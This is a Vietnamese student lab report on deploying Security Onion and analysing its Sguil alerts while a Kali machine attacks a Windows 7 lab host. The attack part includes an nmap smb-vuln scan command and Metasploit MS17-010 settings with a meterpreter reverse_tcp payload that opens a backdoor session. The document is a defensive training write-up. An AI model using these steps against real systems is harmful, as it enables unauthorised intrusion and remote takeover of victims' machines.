- 01 máy chủ cài đặt công cụ Security Onion để giám sát mạng.. Các bước thực hiệnCài đặt công cụ Security Onion - Cài đặt Security Onion - Cấu hình Security Onion Thực hiện tấn công và p
Trang 1HỌC VIỆN KỸ THUẬT MẬT MÃ
KHOA AN TOÀN THÔNG TIN
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
BÀI TẬP MÔNQUẢN TRỊ AN TOÀN HỆ THỐNG
TRIỂN KHAI HỆ THỐNG GIÁM SÁT ATTT
Trang 22
-MỤC LỤC TRIỂN KHAI HỆ THỐNG GIÁM SÁT ATTT SECURITY ONION
1.1 Chuẩn bị
- 01 máy người dùng chạy hệ điều hành Windows 7 có kết nối vào LAN
- 01 máy ảo chạy hệ điều hành Kali Linux kết nối cùng với LAN củaWindows 7 để thực hiện xâm nhập mạng
- 01 máy chủ cài đặt công cụ Security Onion để giám sát mạng
1.2 Mô hình triển khai
Trang 31.3 Các bước thực hiện
Cài đặt công cụ Security Onion
- Cài đặt Security Onion
- Cấu hình Security Onion
Thực hiện tấn công và phân tích cảnh báo trên hệ thống giám sát
1.4 Thực hiện
1.4.1 Cài đặt công cụ Security Onion
Bấm chọn New Virtual Machine để tạo một máy ảo mới, sau đó thêm file ISO
và bấm Next để tiếp tục:
Trang 4Chọn hệ điều hành Linux và version Ubuntu sau đó bấm Next để tiếp tục:
Đặt tên cho máy ảo tại mục name và chọn đường dẫn tại mục location:
Cài đặt các thông số cho máy ảo và bấm Close để kết thúc quá trình tạo mới
Trang 5Giao diện chính xuất hiện, chọn Install để chuyển đến giao diện cài đặt.
Chọn ngôn ngữ cài đặt là English, chọn Next để tiếp tục
Trang 6Thiết lập loại cài đặt, tại đây chọn Erase disk and install Security Onion (dọn dẹp ổ đĩa và cài đặt Security Onion) Bấm chọn Install Now để cài đặt ngay.
Giao diện tiếp theo lựa chọn loại bàn phím English (US) :
Trang 7Đặt tên máy và mật khẩu thích hợp, chọn Require my password to log in để yêu cầu mật khẩu mỗi lần đăng nhập :
Giao diện cài đặt xuất hiện như hình sau :quá trình cài đặt mất vài phút
Trang 8Quá trình cài đặt hoàn tất, thoát khỏi cửa sổ cài đặt Bấm chọn Restart Now
để khởi động lại và lưu lại toàn bộ thông số trong quá trình cài đặt
Quá trình cài đặt thành công
Trang 9Cấu hình Security Onion
Bấm chọn Set up icon để bắt đầu quá trình cấu hình :
Giao diện cấu hình như sau, xuất hiện các công cụ được hỗ trợ trong bộ công
cụ Security Onion Bấm Yes và tiếp tục
Tại bước này bỏ qua việc cấu hình mạng bằng cách chọn Yes, skip network configuration
Trang 10Giao diện tiếp theo lựa chọn chế độ, chọn chế độ Production Mode (cấu hình bằng tay thay vì cấu hình tự động).
Bấm chọn New để tạo mới máy chủ Security Onion :
Trang 11Tạo tài khoản để đăng nhập vào các dịch vụ Kibana, Squert, Sguil trong Security Onion với tên là kma3:
Trang 12Thiết lập mật khẩu cho tài khoản đăng nhập trên, yêu cầu mật khẩu với độ dài tối thiếu là 6 ký tự Thực hiện xác nhận lại mật khẩu ở bước sau :
Giao diện tiếp theo lựa chọn bộ luật IDS mong muốn sử dụng, chọn Emerging Threats Open (các mối đe dọa mới ) :
Trang 13Tiếp theo chọn IDS engine, tại bước trên chọn luật Emerging Threats sẽ chọn engine
là Suricata :
Trang 14Cài đặt định dạng IP cho HOME_NET (có thể để mặc định) Sau đó click chọn “OK”
Trang 16Nhập dung lượng không gian lưu trữ (GB), tối thiểu 19GB, sau đó nhấp “OK”
Trang 181.4.2 Thực hiện tấn công và phân tích cảnh báo
Khởi động máy Kali Linux và máy trạm Win 7, thiết lập địa chỉ IP Từ máy attacker Kali thực hiện tấn công metaspolit đến máy victim windows 7, sử dụng công cụ Sguil để thu thập và phân tích các cảnh báo
Đăng nhập bằng tài khoản và mật khẩu đã cấu hình vào Sguil trên giao diện Security Onion
Chọn vùng mạng cần giám sát, ở đây thiết lập card mạng ens33 Tích chọn Start SGUIL để đi đến giao diện giám sát
Trang 19Thực hiện ping kiểm tra kêt nối từ máy attacker tới máy win 7 Theo dõi cảnh báo trên Sguil.
Quá trình ping thực hiện 6 gói tin đồng thời trên Sguil cũng hiển thị được gói tin này và đếm được đúng 6 gói tin với thời gian thực:
Tại gói ICMP thấy địa chỉ IP nguồn 192.168.2.128 và địa chỉ IP đích
192.168.2.129 được hiển thị với Protocol = 1 (ICMP)
Có Event Message là GPL đây là luật cảnh báo cũ của Snort, phía sau là tên đính kèm cảnh báo
Trang 20Khi trỏ tới gói ICMP, Sguil hiển thị ra một vùng hiển thị chi tiết gói tin đó:
Tích Show Packet Data và Show Rules để xem chi tiết
Phía trên cùng là các luật: ở đây là luật cảnh báo ICMP (alert icmp)
Phía dưới là thông tin của IP Header được chỉ ra như Version = 4,
HeaderLength = 5 ,Time to live = 64 chỉ ra hệ điều hành Linux
Tiếp theo là thông tin kiểu thông báo ICMP: với code 0 và type =8 tức là kiểu Echo Request
Phần còn lại là Data 56 byte
Thực hiện dò quét cổng trên máy Attacker tới máy Win 7 bằng nmap.
Trang 21Sau khi xong thấy danh sách cổng mở trên win 7.
Phía bên Sguil cũng thu thập và đưa ra cảnh báo ngay lập tức:
Trang 22 Có 6 cảnh báo ET được đưa ra tương ứng với 6 mối đe dọa từ việc dò quét cổng
Thực hiện với Protocol = 6 = TCP
Phía dưới vẫn là các luật và thông tin thu thập được Phần Data = None tức là gói này không mang data
Tấn công vào cổng 445 do phần trên quét thấy cổng 445 là open
# nmap –script smb-vuln* -p445 192.168.2.129
Trang 23Tấn công smb với vulnerable cho được một số lỗ hổng trên windows 7 đặc biệt là lỗ hổng ms17-010, khai thác lỗ hổng này có thể chiếm quyền kiểmsoát máy nạn nhân.
Công cụ Sguil cũng thu thập được những khả năng tấn công này:
Tương tự cũng có cảnh báo khi Attacker thực hiện trên cổng 445, giao thức sử dụng là TCP = 6
Thực hiện tấn công bằng metasploit
Khởi động metasploits và thực hiện tìm kiếm lỗ hổng trong database
“set LHOST 192.168.2.128”: địa chỉ ip máy attacker
“set RHOST 192.168.2.129”: địa chỉ ip máy victim
Trang 24Lựa chọn sử dụng payload để khai thác: “set payload
windows/meterpreter/reverse_tcp
Tại máy Kali Linux, ta sẽ nhận được thông báo đã mở 1 phiên kết nối tới máy Windows 7
Trang 25Quay lại Sguil cũng nhận được thông tin cuộc tấn cống và cảnh báo:
Trang 26Chúng ta có thể thấy rõ cuộc tấn công từ exploit xuất phát từ địa chỉ ip nguồn192.168.2.128 , địa chỉ ip đích 192.168.2.129 thông qua cổng 445 và protocol = 6(TCP) Tại đây có thể thấy giá trị trường Time to live (TTL=64) ta có thể biết đây
là hệ điều hành Linux
Sau khi khai thác thành công, một cửa hậu đã được mở ra, máy nạn nhân đã gửi gói tin ngược trở lại cho attacker cũng thông qua cổng 445 Tại đây giá trị trường Time to live = 128 ta có thể biết đây là hệ điều hành Windows
Trang 27Ngoài ra Sguil còn cho phép liệt kê, phân tích và trích xuất luồng.
Giả sử trích xuất luồng của gói tin MSF style trên cổng 445 giúp việc phân tích xác định hành vi nghi ngờ